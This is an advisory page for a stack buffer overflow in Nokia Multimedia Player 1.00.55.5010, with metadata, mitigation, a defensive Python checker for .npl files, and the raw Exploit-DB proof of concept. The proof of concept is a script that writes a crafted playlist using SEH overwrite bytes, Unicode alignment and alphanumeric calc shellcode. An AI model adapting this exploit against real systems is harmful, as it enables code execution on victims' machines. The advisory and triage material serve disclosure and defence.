vendor: Multimedia Player
by: Carlos Mario Penagos Hollmann
CVSS: 9.3 HIGH
Buffer Overflow
CWE: 119
Product Name: Multimedia Player
Affected Version From: 1.00.55.5010
Affected Version To: 1.00.55.5010
Patch Exists: YES
Related CWE: N/A
CPE: a:nokia:multimedia_player:1.00.55.5010
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2011

Nokia Multimedia player SEH Unicode

Nokia Multimedia Player 1.00.55.5010 contains a stack-based buffer overflow caused by improper bounds checking of user-supplied input when the application handles a .NPL file. An attacker who entices a user to open a specially crafted .NPL file can execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of Nokia Multimedia Player.
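
Where the affected version cannot be upgraded immediately, .npl files can be triaged before they are opened. The following is an added example, not part of the original advisory or exploit: it flags files whose content looks like overflow filler rather than a playlist. The one-entry-per-line layout, the 260-byte line limit and the 64-byte run limit are assumptions, and both sample inputs are constructed.

```python
"""Pre-open triage for .npl files (added example; thresholds are assumptions)."""
import re
import sys

MAX_LINE = 260  # assumption: no playlist entry is longer than a Windows path
MAX_RUN = 64    # assumption: a longer run of one repeated byte is filler

# Constructed samples: a plausible playlist and an oversized single-line file.
BENIGN = b"C:\\Music\\track01.mp3\r\nC:\\Music\\track02.mp3\r\n"
SUSPECT = b"A" * 3000 + b"\xcc" * 100


def inspect_npl(data):
    """Return the reasons a file looks malformed; an empty list means clean."""
    findings = []

    # An entry far longer than any path is the precondition for the overflow.
    lines = data.splitlines() or [b""]
    longest = max(len(line) for line in lines)
    if longest > MAX_LINE:
        findings.append("line of %d bytes exceeds %d" % (longest, MAX_LINE))

    # Padding to reach a fixed offset shows up as one byte repeated many times.
    run = re.search(rb"(.)\1{%d,}" % (MAX_RUN - 1), data, re.DOTALL)
    if run:
        findings.append("run of %d x 0x%02x at offset %d"
                        % (len(run.group()), run.group(1)[0], run.start()))

    # Control and high bytes do not belong in a text playlist.
    odd = sum(1 for b in data
              if b > 0x7E or (b < 0x20 and b not in b"\t\r\n"))
    if odd:
        findings.append("%d non-printable bytes" % odd)
    return findings


def inspect_file(path):
    """Read a file from disk and run the same checks on its bytes."""
    with open(path, "rb") as handle:
        return inspect_npl(handle.read())


if __name__ == "__main__":
    # Usage: python triage_npl.py playlist1.npl playlist2.npl ...
    for name in sys.argv[1:]:
        reasons = inspect_file(name)
        print("%s: %s" % (name, "; ".join(reasons) if reasons else "ok"))
```

A non-empty result is a reason to quarantine the file for review, not proof of malice; tune both limits against real playlists from your environment.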

Exploit-DB raw data:

# Exploit Title: Nokia Multimedia player  SEH Unicode
# Date: January 11 2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://www.brothersoft.com/nokia-multimedia-player-download-46238.html
# Version: 1.00.55.5010
# Tested on: Windows xp sp3 running on VMware Fusion 3.1 and VirtualBox 3.2.8

 
#  mail----> shogilord^gmail.com spams are welcome!!!!! 
#    ________  _    _________   ____ __ _____   ________
#   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
#  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __ 
# / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ / 
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/  
 
# COLOMBIA hacking presents.............
#     
# Dont be afraid of unicode my young padawan 
# 
# Big Thanks to sud0 !!
#

junk="\x44" * 2660

shellcode = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBdK8lPU4KjLS8o0mPO0LoQXc3QQPlpcdMa5YhnpVXgWRs920wkOXPA" #calc shellcode

nseh="\x61\xC5" 

align = "\x61\x6D\x61\x6D\x50\x6E\xC3" 


seh="\xEF\x42"

junk2="\xcc"*45

junk3="\xcc"*850

buff=junk+nseh+seh+align+junk2+shellcode+junk3

magic = open("Crash1234.npl","w")

magic.write(buff)

magic.close()